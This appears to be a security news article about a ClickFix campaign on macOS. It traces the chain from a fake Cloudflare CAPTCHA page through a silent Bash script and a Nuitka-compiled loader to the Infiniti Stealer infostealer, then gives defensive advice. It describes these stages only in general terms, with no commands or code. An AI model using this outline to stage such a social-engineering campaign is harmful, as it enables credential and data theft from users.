Cybercriminals have engineered a scheme that mimics legitimate Cloudflare pages to carry out what is known as a ClickFix attack, targeting macOS systems. Upon visiting a compromised site, users encounter a convincing fake CAPTCHA page designed to trick them into executing malicious commands without realizing it. This social engineering technique has become increasingly common among threat actors looking to bypass traditional security controls, as it relies on human interaction rather than software exploits alone.
A Bash Script Quietly Takes Over the System
Once the user interacts with the fake CAPTCHA prompt, the attack moves into its next stage by deploying a Bash script that runs silently in the background. This script is responsible for downloading and setting up the additional components required to complete the infection chain. Because it operates beneath the surface of normal user activity, it is particularly difficult to detect without dedicated endpoint monitoring tools in place.
The Nuitka Loader Obscures the Malicious Payload
To further evade detection, the threat actors behind this campaign use Nuitka, a Python-to-machine-code compiler, as a loader for the next phase of the attack. By compiling Python code directly into machine code, Nuitka-based loaders are far more difficult for traditional antivirus and security tools to flag compared to standard Python scripts. This layered obfuscation approach is a deliberate effort to extend the window of time the malware can operate undetected on a compromised machine.
Infiniti Stealer Harvests Sensitive Data From macOS Devices
The final payload delivered through this infection chain is a Python-based infostealer known as Infiniti Stealer. Once deployed on a victim’s macOS device, it begins harvesting sensitive information including credentials and system data, which can then be used for unauthorized access, identity theft, or further downstream attacks. The combination of a fake Cloudflare CAPTCHA, a Bash script, a Nuitka loader, and the Python-based infostealer makes this a well-structured, multi-stage threat that is harder to disrupt at any single point.
How Organizations Can Defend Against ClickFix-Style Threats
To reduce exposure to attacks like this one, organizations should deploy advanced endpoint detection and response tools capable of identifying unusual script execution and outbound data transfers on macOS devices. Regular security awareness training is also critical, particularly around social engineering tactics like fake CAPTCHA pages. Routine security assessments and keeping software up to date remain foundational steps in reducing the attack surface available to threat actors running campaigns of this nature.
